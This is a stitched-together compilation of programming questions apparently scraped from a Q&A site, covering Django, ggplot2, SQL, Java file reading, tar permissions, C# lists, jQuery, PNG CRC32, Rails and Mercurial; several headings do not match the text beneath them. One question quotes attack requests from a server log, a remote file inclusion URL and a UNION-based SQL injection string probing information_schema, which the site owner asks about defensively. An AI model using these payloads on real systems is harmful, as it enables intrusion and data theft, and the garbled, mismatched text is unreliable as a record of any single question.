• Django + dbxml + Apache = problems. Any solutions?

  I'm trying to set up a Django application using WSGI. That works fine. However, I am having some issues with part of my Django app that uses BDB XML.   Hi there, I thought hours about that problem but I didn't come to any conclusion. My problem here is that I need a 'Previous' Button added to a form. The user should fill out a formular that is splitted up in 13 parts. Every part is an own formular having a 'Next' button for submitting everything to a database and redirecting to the next page. How do I integrate a 'Previous' button there? ... I don't if it might be usefull for you to know that I'm using cakePHP, and well I'm pretty new to it.

  I would like to have a very short / minimal example of how to create some tabular widget with different types of item in it. In the first round let's say I'd like to render [["Hello", 12, True], ["World", 13, False]] (Hello as string, 12 as number (right-align), True as a checkbox for eg.), but it would be nice to have Dates, Colors, and other type of info. Next round: editing (integer with spinbox, maybe sometimes a combobox is handy, but that may not work out of the box). There must be a simple solution, but I couldn't find...

• plot only x and y axis (no box) in ggplot2

  The convention of some journals is to show only the x and y axis in a plot not a box around the entire plot area. How can I achieve this in ggplot2?   In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example: /?x=19&y=15 The numbers are random, but its always setting x and y variables. Another category of mysterious requests: /?id=http://nic.bupt.edu.cn/media/j1.txt?? There are other attempts at injections in the request log that have straight sql written into them as well. Example: /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13-- It looks like they are all reaching a 404, but I'm still wondering about the intent behind these. I know this is vague, but maybe someone knows that this is normal while using cPanel & phpMyAdmin services. Also, there was a search box installed on the site which could be the reason. Any suggestions as to what all these are?

• Is there a combination of "LIKE" and "IN" in SQL?

  Hi folks. In SQL I (sadly) often have to use "LIKE" conditions due to databases that violate nearly every rule of normalization. I can't change that right now. But that's irrelevant to the question. Further, I often use conditions like WHERE something in (1,1,2,3,5,8,13,21) for better readability and flexibility of my SQL statements. Is there any possible way to combine these two things without writing complicated sub-selects? I want something as easy as WHERE something LIKE ('bla%', '%foo%', 'batz%') instead of WHERE something LIKE 'bla%' OR something LIKE '%foo%' OR something LIKE 'batz%' I'm working with MS SQl Server and Oracle here but I'm interested if this is possible in any RDBMS at all.

• Read a file with 2048 bytes

  Guys i have a file which has only one line. The file has no encoding it is a simple text file with single line. For every 2048 byte in a line , there is new record of 151 byte (totally 13*151 byte = 1945 records + 85 byte empty space). similarly for the next 2048 bytes. What is the best file i/o to use? i am thinking of reading 2048 bytes from file and storing it in an array . while (offset < fileLength &&(numRead=in.read(recordChunks, offset,alength)) >= 0) { } how can i get from the read statement only 2048 bytes at a time . i am getting IndexOutofBoundException.

• After tar extract, Changing Permissions

  Just a Question Regarding unix and PHP today. What I am doing on my PHP is using the Unix system to untar a tarred file. exec("tar -xzf foo.tar.gz"); Generally everything works fine until I run into this particular foo.tar.gz, which has a file system as follows: Applications/ Library/ Systems/ After running the tar command, it seems that the file permissions get changed to 644 (instead of 755). This causes Permission denied (errno 13) and therefore disabling most of my code. (I'm guessing from lack of privileges) Any way I can stop this tar command completely ruining my permissions? Thanks. Oh and this seems to only happen when I have a foo.tar.gz file that Has this particular file system. Anything else and I'm good.

• c# list<int> how to insert a new value in between two values

  so i have a list where i need to add new values constantly but when i do i need to increment it and insert it in between two values. List<int> initializers = new List <int>(); initializers.Add(1); initializers.Add(3); so initializers would have 1, 3 values. i would then process a new set of numbers. the initializers will need to have the values. 1, 5, 3, 7 and if i process another set of numbers it should become 1, 9, 5, 13, 3, 11, 7, 15 i know how to properly generate the new values inserted, i just need some help on inserting it in between the existing values of the initializers without having to add 2 or 3 more loops to move the values' positions.

I am trying to make it so the user can also just press the "enter" key from the password box: $("#pword").keydown(function(e) { if (e.keyCode == 13) { goLogin(); } }); Using Firefox, both ways work just fine and the user is logged in. With Chrome however, pressing "enter" hits the error function of my .ajax call and will not log the user in. The parameters and responses look identical through Firefox's console, as expected. What would be causing this and/or how can I debug it in Chrome?

  I'm attempting to mimic the function used for creating CRC's in PNG files, I'm using the autodin II polynomial and the source code from: http://www.opensource.apple.com/source/xnu/xnu-1456.1.26/bsd/libkern/crc32.c My tests have all been for the IHDR chunk, so my parameters have been: crc - 0xffffffff and 0 (both have been suggested) buff - the address of the IHDR Chunk's type. length - the IHDR Chunk's length + 4 (the length of the chunk's data + the length of the type) I printed the calculated CRC in binary, which I compared to the actual CRC of the chunk. I can see no similarities (little-big endian, reversed bits, XOR'd, etc). This is the data for the IHDR chunk (hexadecimal format): length(big endian): d0 00 00 00 (13) type: 49 48 44 52 data: 00 00 01 77 00 00 01 68 08 06 00 00 00 existing CRC: b0 bb 40 ac If anyone can tell me why my calculations are off, or give me a CRC32 function that will work I would greatly appreciate it.   I have a table like the one below. How can I get Excel to put borders around groups with the same number in the 4th column so that there is a border around the groups. I was thinking conditional formatting could do it but I can't think how. So I think the only option is a macro. I can use regex to extract the info with preg_match_all but I feel this is not the right way as the data is already well structured. Any other method ?

• Model's method not being recognized when called

  I'm using ruby on rails 2.3.2 and also using the acts_as_taggable_on puglin. That generated me two db tables: tags and taggings. As I didn't need anything more from those, I didn't create a Tag model, for example. Now the project is more mature, I need to create some methods for tags, so I created a Tag model with some methods in it. The model looks something like this: class Tag < ActiveRecord::Base def self.get_parent parent = Tag.find(self.parent_id) return parent end end When I call it from a controller, it won't find the method. This is the code: tag = Tag.find(tag_id) the_parent = tag.get_parent This will throw an error saying: undefined method `get_parent' for #<Tag id: 13, name: "Historia", parent_id: 12> I don't know what's wrong. Any help will be appreciated.

  I have a strange layout for an ItemsControl. I have a 4x6 grid with the following pattern: 1 2 3 4 13 14 15 16 5 6 7 8 17 18 19 20 9 10 11 12 21 22 23 24 Is there an easy way to do this? should I be using 6 Items Controls and take "sections" of my list? is there a good way to do this? What about notification? It's important to note that I may, or may not, have all 24 entries present, but the layout needs to be maintained (think of it like filled slots on a bingo card or something)

So I open my project using GNU Emacs 23.2.1. When I want to comment my changes in emacs I get the following error: can't move /home/jbloggs/projects/mnt/ssd1/.svn/tmp/entries to /home/jbloggs/mnt/ssd1/.svn/entries: Operation not permitted Does anyone know of any way I can resolve this issue? many thanks for any advice,

• Mercurial Branching Model for task features

  My development env: Windows 7, TortoiseHg, ASP.NET 4.0/MVC3 Test branch: code on test server Prod branch: code on production server This is my current branching model. The reason to branch out every task (feature) is because some features go to live slower. So in above graph, task 1 finished earlier (changeset #5), and merge into test branch for testing. However, due to bug or modification of original request, changesets #10, #12 have been made. While task 2 has finished testing #8 and pushed to live #9 already. My problem is every time when modifying task branch (like #10, #12), I have to do another merge to test branch (#11, #13), this makes the graph very messy. Is there any way to solve this issue? Or any better branching model?
